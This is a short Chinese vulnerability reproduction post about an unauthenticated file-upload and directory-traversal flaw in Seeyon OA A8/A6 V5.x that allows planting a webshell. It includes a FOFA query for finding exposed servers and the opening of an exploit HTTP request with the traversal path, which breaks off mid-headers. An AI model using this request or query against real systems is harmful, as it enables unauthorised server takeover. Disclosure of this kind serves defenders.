0x01 产品简介

致远互联-OA 是数字化构建企业数字化协同运营中台，面向企业各种业务场景提供一站式大数据分析解决方案的协同办公软件。

0x02 漏洞概述

致远互联-OA 接口 fileUpload.do 接口处存在文件上传漏洞，未经身份验证的远程攻击者可通过目录遍历的方式绕过上传接口限制，并利用menu.do接口替换上传文件的fileid值实现webshell上传到服务器，获取服务器权限，控制整个 web 服务器。

0x03 影响范围

 致远A8 V5.x 版本

 致远A6 V5.x 版本

0x04 复现环境

FOFA：title="协同管理软件 V5.6SP1"

0x05 漏洞复现

上传图片获取fileid值

POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1
Host: your-ip
Accept: text/html, image/gif, image/jpeg,